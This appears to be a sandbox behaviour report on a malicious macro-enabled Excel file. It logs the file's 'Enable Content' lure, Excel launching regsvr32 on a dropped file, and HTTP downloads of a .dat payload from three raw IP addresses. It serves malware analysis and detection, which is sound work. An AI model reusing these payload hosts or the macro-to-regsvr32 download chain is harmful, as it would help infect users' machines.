Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2492, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 1980 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe |
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 185.240.103.219:80 |
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 185.240.103.219:80 |
Source: global traffic | HTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.240.103.219Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A07B784.jpg | Jump to behavior |
Source: global traffic | HTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.240.103.219Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive |
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com |
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/ |
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp |
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: regsvr32.exe, 00000003.00000002.2145875153.0000000003A70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124555329.0000000003C50000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: regsvr32.exe, 00000003.00000002.2145275904.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124011430.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2105200473.0000000001CC0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll |
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: regsvr32.exe, 00000003.00000002.2145875153.0000000003A70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124555329.0000000003C50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA |
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe |
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv. |
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing from the 19 ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from th |
Source: Screenshot number: 4 | Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A r7m r7m .. |
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing from the ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from the In |
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 30 31 32 33 ) CI O 34 35 36 37 38 , Id 1 p pi Sheetl tj i q |1|| P A Gy m |
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can |
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content |
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca |
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content |
Source: Permission-414467145-06252021.xlsm | Initial sample: EXEC |
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_ |
Source: classification engine | Classification label: mal64.expl.evad.winXLSM@7/7@0/3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Permission-414467145-06252021.xlsm | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC6B8.tmp | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2 |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: Permission-414467145-06252021.xlsm | Initial sample: OLE zip file path = xl/media/image1.jpg |
Source: Permission-414467145-06252021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels |
Source: Permission-414467145-06252021.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\regsvr32.exe TID: 1552 | Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\System32\regsvr32.exe TID: 3040 | Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\System32\regsvr32.exe TID: 3028 | Thread sleep time: -60000s >= -30000s |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.